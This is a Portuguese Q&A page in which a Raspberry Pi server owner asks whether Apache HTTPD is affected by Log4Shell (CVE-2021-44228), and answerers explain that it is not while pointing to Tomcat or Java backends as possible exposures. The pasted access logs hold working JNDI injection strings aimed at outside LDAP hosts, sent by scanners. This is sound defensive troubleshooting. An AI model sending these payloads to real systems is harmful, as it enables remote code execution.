Início / server / Perguntas / 1086113
Accepted
gilex
Asked: 2021-12-13 11:07:30 +0800 CST

O Apache Webserver usa log4j (CVE-2021-44228)?

  • 772

O servidor web apache (apache2) usa log4j?

Eu tenho o Apache2 2.4.38 (debian) instalado no Raspberry Pi OS (64 bits) e encontrei alguns registros estranhos no meu log sobre CVE-2021-44228 de ( kryptoslogic-cve-2021-44228.comhoneypot/scanner), dataastatistics.com(offline & malicioso?) a8fvkc.dnslog.cnisto é)

O que eu deveria fazer agora?

  • nada porque o apache2 não é afetado pelo CVE-2021-44228
  • formate tudo e espere alguns dias antes de instalar uma versão corrigida
  • "verifique" se existem novos arquivos .class e se não houver continue a operação (e use patches manuais comolog4j2.formatMsgNoLookups = TRUE
  • algo mais

Histórico:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
apache2

2 respostas

  1. Best Answer

    O Apache HTTP Server não é escrito em Java, ele não usa a biblioteca log4j, portanto não é afetado pelo CVE-2021-44228.

    Seus arquivos de log são do log de acesso, eles mostram as pessoas verificando a vulnerabilidade do log4j.

    • 82

  2. O próprio Apache não é escrito em Java e não vincula diretamente a infame biblioteca Log4j. É particularmente seguro contra esta vulnerabilidade.

    O que mais pode dar errado, então?

    1. Nem tudo com Apache em seu nome e funções HTTP é exatamente o servidor Apache HTTPD. O Apache Tomcat, por exemplo, é um servidor web HTTP completamente diferente. Ele é escrito em Java e pode ser configurado para usar o Log4J. Não tenho certeza se é possível fazer login de outra forma no Tomcat.

    Alguém com menos experiência e conhecimento é perfeitamente capaz de confundir esses dois. E, que eu saiba, o Tomcat tem, em geral, um histórico de segurança melhor do que o Apache HTTPD "clássico".

    (De acordo com o comentário de Bob, o recurso de registro padrão no Tomcat não é o Log4J.)

    1. Apache HTTPD é muito extensível. Ele pode ser configurado para chamar outras coisas em segundo plano por uma variedade de interfaces (por exemplo, para buscar páginas da Web dinâmicas que são geradas programaticamente). Algumas dessas "coisas em segundo plano" podem ser baseadas em Java e vinculadas à biblioteca Log4J.

    Sua milhagem pode variar, especialmente se você não conhecer em detalhes sua pilha de software.

    Para ter certeza, você deve primeiro verificar se tem alguma máquina Java instalada. Em seu gerenciador de pacotes, os pacotes serão chamados de JRE-algo, JVM-algo ou talvez JAVA-algo.

    Você também pode tentar:

    java -versão

    em sua concha.

    Se você não tem nenhum desses e não instalou o JAVA fora do seu gerenciador de pacotes, você está seguro.

    Não é seguro em geral, mas pelo menos seguro contra CVE-2021-44228.

    • 8

relate perguntas